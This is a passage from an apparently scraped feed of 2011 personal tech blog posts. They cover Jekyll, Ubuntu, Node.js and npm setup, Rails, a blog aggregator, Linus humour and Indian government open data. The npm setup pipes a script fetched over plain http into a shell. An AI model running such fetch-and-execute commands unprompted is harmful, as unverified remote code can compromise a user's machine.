It has got lots of features as well:\n\nShare URLs while your stuff is uploading\nShare without even logging in\nDrag and drop upload\nVersioning for file Uploads\nShare multiple files under a single upload\nLimited Analytics (See number of Downloads)\nSo yes, it’s not as powerful as many others, but it has got quite enough features to keep me busy.\nMinus\nMinus is a simple image sharing service. It was amongst the first to offer Drag-And-Drop upload back before it was cool. Right now, it is trying to become the next flickr, allowing people to subscribe to each other. If you are someone who posts cool pics regularly, check this out.\n\nMy primary browser is Chromium, and here are some Chrome Applications that I use regularly:\nOffline GMail\nWas a Chrome extension that used Google Gears for letting you use GMail completely offline.\n\nPros:\nLooks cool\nAllows multiple accounts\nDrafts facility\nLabels\nCons:\nNot all the functionality of Online GMail\nCollaborative Editors\nI like collaborative editing, working together with people in real-time. Unfortunately, the biggest entrant fizzled out. However, there are still quite a lot of competitors left in the field.\nGoogle Docs\nI tend to avoid Google Docs usually, as it is too much of a bloat for me. The integration with Google Chat is good, but sometimes all you need is a plain text editor. There is also an Offline Google Docs application, although it does not allow one to edit documents. Also no presentations.\nEtherpad\nEtherpad is quite good, as a plain text collaborative editor. I tend to use it frequently, and it has some excellent features. It makes a thousand revisions of each of my posts, and allows me to play through them, and see who made what change in real-time. All this, for free. Plus you get chat, and basic formatting (bold, italics, underline).\nThe previously mentioned workflowy keeps your lists in sync over time, so it is collaborative, though not in real time.\nAlso, mention goes out to pastehtml, which does an excellent job. It’s neither collaborative nor does it have sharing, but it had me hooked at editable markdown. You can type in markdown, publish in html, and come back and edit your documents, as per your heart’s wish.\nGrooveshark\nI rarely listen to music online, but when I do, it’s either on Youtube or Grooveshark.\n\nLooking back at this document, it seems that there are not many web-apps that I use.\nSome other applications that I regularly use, in no particular order:\nFreedCamp - A free alternative to Basecamp\nIssueBurner - Simple Issue Tracking via Email\nPostary - A simple blogging platform. “Write.Share.”\nLastPass - Password Manager\nI’ll probably add some Chrome Extensions later as well.",[],{"slug":3109,"title":3110,"link":3111,"pubDate":3112,"contentSnippet":3113,"tags":3114,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"jekyll","Blogging with Jekyll","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F09\u002F19\u002Fjekyll\u002F","2011-09-19T00:00:00.000Z","For the past few years, there has been a revolution in the blogging scene. People have moved towards better hosting providers and better blogging tools, with automated and delayed blogging becoming the norm. Posts are written months in advance, and proof-read dozens of times, before making it to the general public. Wordpress, Blogspot, Tumblr, Posterous, Textpattern are pretty much everything that most of the bloggers use. However, there have been some silent niche entries in this market.
Static Site Generators.\nStatic Site Generators\nStatic Site Generators are tools which you use to generate a static version of your site. Instead of using a dynamic scripting language (such as php), your tool takes in your markup & combines it with your blog posts to generate an html-only version of your site. This version is then uploaded (e.g. via ftp) and is then visible as your blog. Most such tools are written in languages such as ruby, python, node.js, and erlang. The most commonly known are Jekyll, Hyde, nanoc, and webby. An excellent list is available here.\nBenefits of using Static Site Generators\nMarkup\nFor me, the most important part of using Jekyll is that it allows me to use markdown as my writing syntax. Markdown is a markup language that is compiled to HTML. It is supposed to be a highly readable version of html. For instance, it uses backticks (`) to write code.\n`this` becomes this\nAlso, you can use * to emphasize text (strong or emphasis). Link creation is not the horrible \u003Ca href=> that you remember, but the sleek looking [Link text](Link URL). Similarly, it offers lots of other features. You can even specify alternative markup languages, such as textile, in the jekyll configuration.\nEase Of Blogging\nYou can write blog entries very easily. I’ve added markdown syntax bindings to vim, my favorite editor, and geany has a markdown plugin as well. I am of the opinion that you should write text entries in a text-editor, not a textarea in a browser window. I used Windows Live Writer for quite some time and still believe that it is far ahead of anything else in the market. But the wpost format that it uses is proprietary, and as such stopped me from importing blog posts anywhere.\nRevision Control\nRevision control tools, such as git, work best with text-files. Since your blog entries are now just plain text files, you can easily store them under version control, easily reverting botched commits, making branches, and merging them back. And in case you do not know it yet, git is awesome!\nLayout Tools\nJekyll allows you to define your layout using Liquid Templating. {{content}} translates to the variable content. Similarly, you can iterate over blog posts by using Liquid tags for foreach (a minimal example follows below). The best part is that this is all done before publishing your website, meaning that the final result is always just pure html. You can easily create static portions of your site (such as headers, footers, sidebars).\nGetting Started With Jekyll\nI’ll start with jekyll, since it is the most used one out there, and runs on github. It even powers this very blog. First, you must install jekyll. On an Ubuntu machine, sudo apt-get install ruby rubygems && gem install jekyll should work. If you are working on development using Ruby, I’d recommend rvm, instead of plain vanilla distro ruby installs. For windows folks, install Ruby, and the Devkit, using RubyInstaller.org. After that, run gem install jekyll.\nInstead of preparing a site from scratch, we will instead be forking an existing site running on jekyll, and using it to model our own. This is partly to shield this tutorial from the html\u002Fcss\u002Fjs which is irrelevant in this case. In this particular case, I will be using my very own website. Download the source code for my website from github and extract it somewhere.
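To give a flavour of those Liquid layout bits, here is a minimal, illustrative _layouts\u002Fdefault.html sketch (not the actual layout of any real site):\n\n\u003Chtml>\n\u003Cbody>\n\t\u003Cul>\n\t{% for post in site.posts %}\n\t\t\u003Cli>\u003Ca href=\"{{ post.url }}\">{{ post.title }}\u003C\u002Fa>\u003C\u002Fli>\n\t{% endfor %}\n\t\u003C\u002Ful>\n\t{{ content }}\n\u003C\u002Fbody>\n\u003C\u002Fhtml>\n\nJekyll replaces {{ content }} with the rendered page or post, and the for loop runs at build time, so the published output is pure html.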
Next, you will have to delete all the content inside the _posts, projects, _drafts, contact, & data directories, as I do not give permission to use those in your site.\nNext, create a file called _posts\u002F2011-month-date.md with the following format:\n\n---\nlayout: post\ntitle: Your Post Title\n---\nYour post content, written in markdown.\n\nNow, open up _layouts\u002F and edit default.html. You’d need basic html skills to replace my photo with your own, and change links to various places. After you are done, just cd into the root directory of the site, and run jekyll. Some output should confirm that the server ran successfully. Open up http:\u002F\u002Flocalhost:4000 in your browser, and you will see your web-site running.\nNow for the hosting part. All of your current site is hosted in the _site folder, so you can upload it anytime you want. Or, if you want, you can use github as your hosting provider. Just follow the instructions on pages.github.com and you should be up and running in no time.",[],{"slug":3116,"title":3117,"link":3118,"pubDate":3119,"contentSnippet":3120,"tags":3121,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"6-months-of-ubuntu","Six Months of Ubuntu","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F09\u002F13\u002F6-months-of-ubuntu\u002F","2011-09-13T00:00:00.000Z","I installed Ubuntu as my primary OS back sometime in February. Not that I hadn’t tried it earlier. In fact, I’d used a copy of Ubuntu 3 back in the day. But this time around, Windows (from my dual boot) just gave up and died. The partition with Windows got heavily corrupted, lost lots of data, and ultimately I had to format it. And Ubuntu dragged through all that. And here I am today, a veteran of 3 Ubuntu versions, starting with 10.10, and right now on the 11.10 beta.\nWhat have I learned? That it’s better than Windows, for one. But several other things as well. I’m writing this post about the general linux-distro scene, and not just Ubuntu specifically. For the period before Feb, I’d been using Linux Mint as my primary OS for quite some time. But Ubuntu Natty Alpha brought all that Unity love (which I doted on once), and I had to move to 11.04.\nReasons to switch to Linux\nIt’s free!\nIt’s free! No more paying up for Windows. People who had Windows ship with their computers would be delighted to know that there is something called a Windows Refund, which allows you to be compensated for the cost of Windows, if you decide not to use it.\nBetter file system\nIf you’ve ever lost yourself in the maze of files in “Program Files”, “AppData”, “Application Data”, “system32” and the like, you’d be delighted to know that there is a very well balanced binary management system in Linux. All binaries are in PATH, unlike Windows, where some programs do that, and most don’t. So you can actually run php, git, ruby from any damn place that you want. People who have tried to compile Java programs using javac on Windows might remember updating PATH. No more of that in Linux.\nFree software!\nThe majority of good software on Windows is paid (and even more so on Mac). But in the Linux world, (almost) everything is free. What is paid for, then? Some games, high-end commercial software and the like. But most of the stuff is free.\nPackage Management\nApparently Windows 8 will have some sort of app-store with it. Which is a long time coming in Windows. But guess what, almost all Linux distros have some flavor of package manager built in. Debian (and Ubuntu) has apt-get, Arch has pacman, Fedora has yum. And installing software is as easy as it could be.
Need mysql? Just type sudo apt-get install mysql-server. Done. Boom. Just like that.\nCustomization Level\nEven though I don’t like the messing up of Gnome by Ubuntu, there are tons of alternatives available. I’m right now using Gnome-Shell, and have plans to move to xmonad, which is another Window Manager. Almost every feature on the Linux desktop can be customized.\nTerminal\nI’d always had several “learn bash scripting” kind of to-dos planned, but never got to them until I started using Linux. Even if you don’t script, the actual power of your machine is unlocked by the terminal. Hacking away in vim, browsing sites using elinks, and ordering Pizzas on the command line is as geeky as it gets. Gnome is designed in such a way as to allow a normal user to use his computer fully without touching the terminal, but if you use it, it gets better & better.\nApplications\nThere was a time I used to be a Windows fanatic, using WMP, Zune, Everything and what not. But now, I’ve got a bigger arsenal of software. Ever used Audacious? That’s my default music player, and it’s awesome.\nSoftware Development\nYou use Windows to develop stuff for Windows. I’m nowhere near writing applications in C#. I’ll probably be hacking away at scripts in ruby, node, python, bash, and building stuff using xul, gtk, webgtk, and qt. All my web applications are ultimately deployed on Linux machines, so it makes sense to write them on Linux. And only Linux has the ease of language package managers, like rubygems, npm, and pip.\nOpen Source\nI haven’t yet checked out the Linux Kernel source code, but I’m thinking of getting my hands dirty real soon. Ever since I joined github, I’ve been introduced to several awesome coders, projects, and organizations. And guess what? It’s all open source! Meaning I actually spend less time writing parsers for xml, and more time working on applications.\nWhat I’ve Learned\nBe utterly fearless\nBack when I was on Windows, a simple partition deletion used to scare me to death. Now? I’m ready for anything. If you, like me, go play with the alphas of all your favorite stuff, then things will break. And it will be fun to solve all that stuff. You will learn a thousand new things in the process, gain lots of rep on askubuntu, and become an Ubuntu Jedi Master. OK, maybe not the last bit, but you shall become utterly fearless of all danger. I had to use my computer without network accessibility for three days. And it didn’t even give me a GUI. So I just drudged along for 3 days straight on the console. :)\nCommunity\nSometimes, I feel people do not get my helpful comments, and offerings of help on Facebook. It’s not their fault. They’ve never been introduced to a proper online, helpful community before. The Linux community is helpful, worldwide, readily available, and has probably already handled the problem that you are facing now.\nServer Administration\nI’m still lacking on the cloud front, as I don’t have servers powerful enough to host virtual machines. But otherwise, I’ve handled lots of stuff. ssh is my thing, and I use git to deploy applications like a pro. I’ve moved on from apache to nginx to cherokee and what not.\nTake Backups\nRemember all those “Take Backups before installing Windows\u002FUbuntu” warnings that pop up while installing your OS? I never paid attention to them, until recently. Now, I’ve got backups scheduled on Dropbox, SpiderOak, and a custom SparkleShare server. I make sure to host my code on github, or my personal git repositories, and back up images to Picasa.
Everyone knows hard discs are unreliable, so why not make your data redundant and take backups?\nThe only counter-argument would be that Windows has a much more streamlined view of things, with almost everything offering a GUI-based application to manage stuff. That’s just not the Linux way. Still, I’m not one of those crazy fanatics who go around preaching Linux (maybe I am!). I feel that if you are using your computer to just open Chrome, Firefox, VLC, and Word, then anything would do. You could probably install android on your computer and do everything you are doing right now. If you are a heavy gamer, then better stay with Windows. And if you are a programmer, switch to Linux.\nWindows 8\nI installed a developer preview copy of Windows 8 recently, and although I was really awed by its design concepts, I feel that it is still lacking on certain fronts. For instance, it seems to me that Microsoft is trying to get Windows 8 onto tablets much more readily than onto desktops. Why? Because there is nothing that can undermine Windows’ superior market share on desktops in the near future. However, Android & iOS have a very strong presence. Ergo, Windows 8 goes to tablets.\nI installed all my favorite programs on Windows 8, but had to switch back after a few days. As a developer, it just does not offer me the same freedom and easy workflow that I am accustomed to. For instance:\nInstalling Ruby with build support for gems took a lot of time and patience.\nCygwin does not compare anywhere near to a bash shell. It’s like the tiny, humble brother of a shell, who turns away when you say PATH. You have to type all those monstrous C:\u002F\\ kind of paths.\nNo App Store. The Windows 8 dev preview does not have an app store yet, which was one of the reasons I had tried Win8. I’m used to frequently browsing the Ubuntu Software Center just to find something that fits.\nI found that my productivity was reduced to half when I was on Windows. I spent too much time looking for stuff which could be done with a single line of bash on Linux.\nTags: operating systems, linux, ubuntu, windows 8, weblog ifest 2011",[],{"slug":3123,"title":3124,"link":3125,"pubDate":3126,"contentSnippet":3127,"tags":3128,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"programming-in-nodejs","Programming in Node.JS","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F09\u002F12\u002Fprogramming-in-nodejs\u002F","2011-09-12T00:00:00.000Z","After my attempts at python and Ruby on Rails, it was time for node.js. You ask me, what is node.js? Remember when Google Chrome came out and went blazing past the rest of the browsers in Javascript benchmarks? That was because of its internal Javascript Engine, called V8.\nSoon, V8 was developed as a backend to an evented IO library, that is now known as node.js. Initially, it was named just node, but to prevent confusion, and explain its javascript inheritance, it was renamed node.js. This is the water-cooler moment of the language. If you know node, you’re the cool guy on the block. So what is so special about node?\nEvented IO\nBasically, node allows you to bring home the same anonymous-function goodness from JQuery onto your server. In advanced terms, node allows evented input\u002Foutput, meaning all the IO calls are non-blocking and evented, or scheduled in parallel. Traditional I\u002FO vs evented I\u002FO: see the sketch below.\nHow To Install\nThe official installation guide is present at https:\u002F\u002Fgithub.com\u002Fjoyent\u002Fnode\u002Fwiki\u002FInstallation.
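To make the I\u002FO contrast above concrete, here is a minimal sketch, with db.query as a hypothetical helper rather than a real node API:\n\n\u002F\u002F Traditional, blocking I\u002FO: the whole process waits for the query\nvar result = db.query(\"select * from posts\");\nconsole.log(result); \u002F\u002F runs only after the query has returned\n\n\u002F\u002F Evented, non-blocking I\u002FO: register a callback and move on\ndb.query(\"select * from posts\", function (result) {\n\tconsole.log(result); \u002F\u002F runs later, when the result is ready\n});\nconsole.log(\"query in flight\"); \u002F\u002F prints first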
For the install itself, I’d present a slightly different version, using nvm, i.e. the Node Version Manager.\nUnix\u002FLinux\nDependencies\nThere are some dependencies for installing node:\nsudo apt-get install git-core build-essential libssl-dev\nRun the corresponding command for your distro (yum etc).\nInstalling nvm\nClone nvm:\ngit clone https:\u002F\u002Fgithub.com\u002Fcreationix\u002Fnvm.git ~\u002F.nvm\nInclude nvm:\n. ~\u002F.nvm\u002Fnvm.sh \u002F\u002FThe dot is important\nSource it from your bash file. Basically, copy the above command (2) into your ~\u002F.bashrc.\nFetching node\nNode is under heavy development at the moment. Development of node is carried out across a stable & a testing branch. The stable branch is the one that you should prefer. As of now, stable is v0.4.11 and testing has reached v0.5.6.\nNow run the following commands:\nnvm install v0.4.11 to install v0.4.11\nnvm use v0.4.11\nnvm alias default v0.4.11 to make it the default\nYou can type which node to see the actual node binary being used.\nPackage Methods\nI would strongly advise against using your distro’s version of node, unless you are on a rolling-release distro, such as Arch. Please do not run sudo apt-get install node to install node. This would only cause much anguish and pain later on.\nAs of now, even the beta of Ubuntu 11.10 holds v0.4.9 and is likely to do so for the next 6 months.\nWindows\nAs I’ve stopped using Windows for quite some time, here are instructions from the official node installation guide.\nWindows Build (Node v0.5.5): http:\u002F\u002Fnodejs.org\u002Fdist\u002Fv0.5.5\u002Fnode.exe\nI would again recommend installing http:\u002F\u002Fnodejs.org\u002Fdist\u002Fv0.4.11\u002Fnode.exe for stability reasons.\nSelf-contained binaries are available at http:\u002F\u002Fnode-js.prcn.co.cc\nNode Package Manager\nAll cool programming languages come with their own package managers. Ruby has rubygems, Python has pip, PHP has PECL, perl has CPAN, and node has npm.\nnpm holds a large collection of packages that are the extra batteries that don’t come included with node. If you need to parse documents, or do some other fancy stuff in node, don’t look further than npm. If you need it, chances are, it already has a package in npm. See the list of packages on the npm site.\nUnix\nA simple one-line install is available for npm:\ncurl http:\u002F\u002Fnpmjs.org\u002Finstall.sh | sh\nAfter that, you can install any package by npm install package. For instance, install jade by npm install jade.\nWindows folks can clone the npm repository and run the included npm.bat file, and hope that it works.\nSimple Servers in Node\nnode.js comes with “batteries included”, and part of that battery is node’s ability to instantly create web servers. Yes, right inside your program, you can easily create web servers, which are fully compliant with HTTP.\nThis is a very simple HTTP server, written using the http module (included) in node:\nvar http=require('http');\nhttp.createServer(function(request, response) {\n  var headers = { \"Content-Type\": \"text\u002Fplain\" };\n  response.writeHead(200, headers); \u002F\u002F send the status code and headers\n  response.end(\"Hello, World!\\n\"); \u002F\u002F write the body and finish the response\n}).listen(8000);\n\nAs you can see, the createServer function takes a callback function as its argument. The callback function is called for each of the requests. All events are handled easily, and instead of the server managing threads, memory etc., node just handles requests.
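If you want to poke at it, curl -i http:\u002F\u002Flocalhost:8000 should print back “Hello, World!” along with the response headers (assuming the port 8000 used above).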
In essence, a request generates an event, which is then handled by the callback function provided.\nThis is quite similar to the way we program event loops in javascript in the browser.\nThe good stuff\nThere are loads of interesting projects using node. Visit the modules section on the node wiki for a list of interesting node modules available. These include node clients for various libraries such as Databases (mysql, postgres, sqlite, Cassandra etc), Microframeworks (like Sinatra), Frameworks, wikis, CMS, parsers and what not.\nI’d recommend starting out with Connect, a middleware framework for node that allows you to easily wrap your application around it. For databases, you can either go with the standard Relational ones (like mysql) or be brave, and take a spin with the noSQL ones like CouchDB, Cassandra, or MongoDB. All of them have native bindings available for node.js.\nReferences\nNode On GitHub, including the wiki, documentation & code\nNodejs.org\nBlogs & Other resources\nNodeJitsu, a company working completely on node.\nGetting Started with Node.JS, Express and CouchDB\n6 Must Have Node.js Modules\nSome cool node projects\nHowToNode\nThe node Beginner book\nNodeCasts\nStackOverflow Questions on node\nHow to store Node.js deployment settings\u002Fconfiguration files?\nHow do I get started with NodeJS\nWhat is node.js\nWhere to host node.js applications",[],{"slug":3130,"title":3131,"link":3132,"pubDate":3133,"contentSnippet":3134,"tags":3135,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"learning-ruby-on-rails","Learning Ruby on Rails","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F08\u002F01\u002Flearning-ruby-on-rails\u002F","2011-08-01T00:00:00.000Z","Continuing my quest on Web Designing, I’ve started learning Ruby On Rails, which is the most-hyped web framework of the moment. After all, Github runs on Ruby On Rails, Redmine uses Rails, and so do Basecamp, Hulu, Scribd, and even Twitter. Even though RoR has Ruby in its name, it’s just a namesake.\nLearning Ruby and learning Rails are two entirely different routes, and learning one only gives you a slight advantage in the other. I’m learning Rails from the excellent book, Ruby On Rails 3 Tutorial, by Michael Hartl. It covers Rails 3, which is one reason I picked it, as Rails 3 is quite different from Rails 2 in comparison.\nRails, in a few words, would be described as a Web framework that makes writing web applications really, really easy. And I really mean that. I’ve been programming in Rails for ~2 days, and I can comfortably say that it is better than any PHP framework (viz CakePHP, CodeIgniter, Kohana), simply because it is powered by Ruby.\nAnd the beauty of Ruby is not in its implementation, but in its elegance. Reading ruby code is like seeing a visual presentation, while PHP is the paragraphed, prose version of the same stuff. Simply put, PHP allows you to do the same things, but it is essentially not readable enough to match Ruby’s elegance.\nRails follows the MVC pattern (Model-View-Controller) for development, and uses it strictly. It has got its own conventions, but as I found out, the concept of Convention over Configuration makes much more sense in Rails than it ever did in PHP. All that time I spent in the CakePHP console was nothing compared to the interactivity of the Rails Console (rails c).
Starting the development server (rails s) is as easy as running the production server (rails s --environment production).\nInstead of writing down another beginner tutorial on Rails, I’d rather direct you to some of the excellent Rails resources:\nRuby on Rails 3 Tutorial, the book I’m reading for learning Rails. Highly recommended.\nRailsBrains, offline API for Rails\nRails Getting Started, the official Rails Getting Started guide\nRails@Stackoverflow",[],{"slug":3137,"title":3138,"link":3139,"pubDate":3140,"contentSnippet":3141,"tags":3142,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"announcing-planet-iitr","Announcing Planet IITR","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F07\u002F09\u002Fannouncing-planet-iitr\u002F","2011-07-09T00:00:00.000Z","Planet IIT-R is a blog collection similar to Planet Ubuntu, Planet Wordpress, and the likes. The basic idea is to create a single address where all blogs of IIT-R are aggregated. This way, people can easily follow happenings and blogs at IIT-Roorkee without individually following various blogs. I’ve added a few blogs to it already, including those of Divye Kapoor, Sanath Rath, Wona, Arasu and the likes.\nA complete list of blogs in the planet is available at http:\u002F\u002Fwww.planetaki.com\u002Fiitr\u002Fsubscriptions\u002F\nUpdate: There is also a feature in planetaki to suggest a website for the planet. Unfortunately, you need to be logged in to planetaki (i.e. have created a planet) to suggest a site. In case you are, you can use the suggestions feature to suggest websites.\nTo suggest a blog to add to the list, please use the form below. You can also see the current spreadsheet here:\nYou can also email me for any further queries.\nhttp:\u002F\u002Fplanetaki.com\nhttp:\u002F\u002Fplanetplanet.com\nSpreadsheet of the form above",[],{"slug":3144,"title":3145,"link":3146,"pubDate":3147,"contentSnippet":3148,"tags":3149,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"linus","What if Linus Torvalds designed Google+","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F07\u002F07\u002Flinus\u002F","2011-07-07T00:00:00.000Z","Google’s announcement of its next big thing, Google+, to take on Facebook left people wondering if the next version would be called Google++. In spite of all the great work that Vic Gundotra has put into Google+, it still lacks something. The creator of linux, Linus Torvalds. Google+ is as-of-now the social network for tech-geeks who are part of a field trial experiment (monkeys!) on the site. Google+ is still halfway geek, and in my imagination it would have been the ultimate geek power tool if it had been designed by Linus. Unfortunately, he is busy developing the linux kernel (10 million lines, 2% being his), and we will have to make do with these thoughts:\nOpen Source: Google+ would be open sourced. Anyone could run Google+ on their own servers, and use it to create their own Social Network.\nCommand Line: The default Google+ client would run natively on linux\u002Funix but would be ported later to Windows using cygwin.\nDifficulty-of-use: Gone are the point-and-click days. You’d be required to have absolute mastery over at least 5 different commands before you can even post a single item to your feed.\nFull Control: You will have full control over whatever you post. You can make 4 changes, stage them, take them back, commit 2 of them, edit a post, and recommit before pushing it to the server.
However, all of this will be stored.\nGit Backend : Both the client and the server will use git as their backend to store history, revisions, links, and circles.\nCircles : would be called trees. And you can tag your trees to take a snapshot of your friends list at a point in time.\nBranching : would allow you to create multiple versions of your profile. The default version will be called master, while you can continue your secret development in alpha, staging, and beta branches. Circles will automatically be associated with branches and auto-post items.\nMerging : will allow for collaborative posts.\nAfter 12 years of development, Google+ will reach version 2.1\nNo deletions : Everything in history has an importance. You are allowed to use rebase to rewrite history. Beware: use cautiously. Incorrect usage may lead to painful scenarios.\nA mascot (direwolf?) would be found for Google+ (probably after it bit Linus in an aquarium)\nFacebook would spend $421m fighting Google+\nThe manual of Google+ would be a labyrinth of switches and command-line arguments for all the features that it came with. A user would be expected to read through the entire manual, or at least the first one-third, before being able to do something of use with the service.\nTo block a user, you must enter his id in an ignore file\n3 years hence, the next big thing would be ghub, offering a farm-like service to create, host, and customize your own Google+ servers.\nNote: Based on the history of Linux, and the usability of git.\nAnnouncement\nThe famous announcement of the Linux kernel on the comp.os.minix mailing list is well-known. Slightly re-written, this is how Linus might have announced Google+.\nTags: WeBlog iFest 2011, humour, linux, linus",[],{"slug":3151,"title":3152,"link":3153,"pubDate":3154,"contentSnippet":3155,"tags":3156,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"why-indian-government-sucks-at-technology","Why Indian Government Sucks at Technology","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F06\u002F22\u002Fwhy-indian-government-sucks-at-technology\u002F","2011-06-22T00:00:00.000Z","Note: All opinions are mine alone. Please keep your opinions limited to comments.\nThis is in the wake of the not-so-anonymous attacks on the NIC servers. Apparently a few people had decided to brand their own version of AnonymousIndia and hack into the NIC servers. This has been viewed as almost normal in the Indian media. This is, after all, something that happens every other day in India. It’s just the Indian Army website, nothing that we care about.\nEven though there are excellent tech-security companies in India, we have never developed the right attitude to it. People still think that hacking is fun, and it’s something that could never happen to them. I’ve never seen people reading the fine print on the thousand social websites they join nowadays. Piracy is rampant in India without any checks, and the Indian Government is silent.\nWhy? Because we are used to it. It has always happened this way.
Information leaks have been a major part of Indian history and will remain so unless we realize that the more we embrace technology, the more we become dependent on it, and the closer we step towards the edge.\nA recent tweet by @divyekapoor reminded me of the AADHAR project, which aims to give out a unique identification number to each Indian citizen.\nHacks like these ensure that I will resist giving my Biometrics to the UID project till they've suffered atleast 4 security breaches.\n— Divye Kapoor (@divyekapoor) June 18, 2011\n\nI read the UIDAI docs, which tell us that it would “prescribe protocols to ensure the confidentiality, privacy and security of data”, and “follow the confidentiality, privacy and security protocols prescribed by the UIDAI”. A search on the uidai.gov.in website gives out a little more detail:\nThe UID database will be guarded both physically and electronically by a few select individuals with high clearance. It will not be available even for many members of the UID staff and will be secured with the best encryption, and in a highly secure data vault. All access details will be properly logged.\nThis is the most that they have to say on the subject. If that makes you feel safe, remember the earlier fiasco involving the security of the EVM machines. Ultimately I’m with the government on that one, however, since a user had to have physical access to actually do any harm to the machine. But it was possible, and the Election Commission kept denying it. As it happened, it seems that all our govt. agencies are probably trying more to hide their technical requirements rather than make them open.\nSo why is this approach taken in India? Bureaucracy? Probably, yes. But I feel that unless the technocrats rise up and actually enter the Indian Govt. technical agencies (such as NIC), nothing will change. For instance, I find that almost everything that the Indian government does is tailored specifically for Windows. There is no reason to plaster “Works best in Internet Explorer 6 at 1024x768” on all your websites; we already know how much the Indian government loves Windows. So much so that they get it pre-installed everywhere, even in government schools, and technical institutions.\nYet there is a small faction that is working tirelessly in the other direction as well. For instance, the Sakshat project has been in the news recently. It would ship with a version of Android (which one?) with Wi-Fi, Bluetooth and other frills. However, the project has been known for shadowing and changing its details at each conference it is unveiled at, so beware. It may suddenly change from an Android to a Windows phone in the next one. Or maybe a blade server (speaking of which, the UID project ordered 68 of them).\nI’ve worked a little bit on online geo-mapping tools earlier (mostly using the Google Maps API). However, I wanted some accurate data for one of my projects (such as geographical boundaries). Other sources for this data are not as reliable, and I found the Bhuvan online tool to be extremely accurate in this respect. If you’ve forgotten Bhuvan, it’s the Indian version of Google Maps. It was supposed to be the tool for mapping things. Unfortunately, as things have panned out, most of its claims have been rubbished (like the 10m resolution power), or made null by the extremely slow servers it uses (and it was supposedly optimized for low bandwidths). If you’re planning to fight Google, you have to step up your game. Try checking out the horrible design of the Bhuvan website.
Leaving aside its horrible interface, Windows-only support (.NET), and the installation of additional plugins just to run it, it had brilliant geographical data (collected via various government agencies). However, as it turns out, this data is not public. Why? It seems that ISRO plans to sell this data to people interested in using it. Wow! So a publicly funded agency decides to make money from the development done using our money. It’s been close to 3 years since its launch. And I’d be highly interested in knowing where it managed to sell this data.\nIn all fairness, they’ve said that they would only sell the high-resolution data, while making the general data freely available to users. But I don’t see it as free unless it’s on my own system, damn it. If by free you mean I’d have to open your website each time I need to find a village, it seems we have different thoughts about the word’s usage. Oh, and there’s a link on the website’s home page to a section called APIs which redirects to the Bhuvan Software download page, where, guess what, there are no APIs at all. I managed to dig a few links and download two versions of their APIs, which seem to be downloaded copies of the documentation of the OpenLayers JavaScript library they are using for mapping in the browser. So the data is available, it seems. But they’re forgetting to mention where.\nSeriously, people, wake up. This is the 21st century, and the most hyped buzzword today is open-source (well, after cloud). And if you really want to work on things, make them open source. Not just the technology, but the data as well. Because open data is essential to the growth and planning of a nation, as Hans Rosling keeps on reminding us. Meanwhile, DRDO decides to go ahead and develop its own operating system. Why? Because it will be closed-source and will be much more secure than any of the variants of Linux. Or so they think.\nThe Informatics Centre still runs thousands of its websites in ASP (not even ASP.NET), and this fact alone is enough to scare me off. With major corporations suffering from data leakage (Sony, Gawker) where user access was compromised, it is high time that someone in the Indian Govt. realizes that you cannot secure your systems by locking them in a vault. These companies did the same, and look at the result.\nEven the American government has come up with an open-source initiative. Their website data.gov is a collection of applications, APIs and raw data collected by various government agencies. And to top it all, the US government invited the top application developers from their platform at data.gov to the White House, hailing them as unsung heroes of the new age. If you’re interested in reading more and taking a stand for the open data democracy, take a look at this whitepaper by the Netherlands Organisation for Applied Scientific Research for a keen review of the major barriers that keep a government from sharing its data. Also go ahead and donate some money to Wikileaks, while you’re at it.\nAnd where does the Indian government stand on this? Not very far behind, but lagging nonetheless. Let us take the prime example of the decennial festival that is the Census. Apparently all census data is free (as it should be). But there is a minor caveat. The entire site is made in ASP (which doesn’t really matter, I just don’t like it), and all the data (tables, figures, maps) are in PDF format. So, you can access the data personally, on a single page. Page by page, it might be thousands of documents, figures, charts, and what not.
But since it is all in PDF format, it is locked down. You could parse it by some means, but the data is supposed to be free, in the best format possible, so that everyone can use it easily. And the geographical boundary data (which I mentioned earlier) is also available in the census results, but only via a Java applet, which does not allow access to the raw data that an application developer would need. Am I expected to file an RTI application just to know the exact boundaries of my state? Or perhaps I should just pay ISRO and be done with it.\nAs an additional easter egg, the census website states the following:\nThe Census of India or any data or content providers shall not be liable for any errors in the content, or for any actions taken in reliance thereon.\nAll efforts have been made to ensure the accuracy and currency of the content on this website. However, users are requested to verify\u002Fcheck any information with us to obtain appropriate professional advice before acting on the information provided in the website. In no event will the Government or office of the Registrar General India be liable for any expense, loss or damage including, without limitation, indirect or consequential loss or damage, or any expense, loss or damage whatsoever arising from use, or loss of use, of data, arising out of or in connection with the use of this website.\nAnd lastly, as an analogue to the excellent Right To Information Act, there must be an analogous Right To Technology Act. It should empower each and every person in the country to know what is happening behind the scenes. We demand total transparency in technological decisions. Not just the passing of tenders, but the decisions which involve actual technological development. For example, at the CDAC website, the government offers a trial version of various forensic tools they’ve developed. Why aren’t they open sourced? Why were they written using a particular language? If RTI fought off the bureaucracy, this could help us eliminate the old technocrat thinking from the Indian Govt. If we are able to get the right data, in the right format, thousands of application developers across the world are willing to create great ways to access that data. Data by itself is not enough, however. It must be met with an equal resolve from people to make it accessible, and usable.\nThis could be a turning point for the Indian Govt. Either they could continue what they’ve been doing and meet their doom in a major state-sponsored hack crippling the entire nation. Or they could take a step back, and do things the right way.\nAnd what is the right way?\n\nUpdate: According to an article in the Economic Times, there is a working draft for bringing open source into e-governance systems in the works.",[],{"slug":3158,"title":3159,"link":3160,"pubDate":3161,"contentSnippet":3162,"tags":3163,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"ubuntu-gitolite-sparkleshare-install","Setting Up 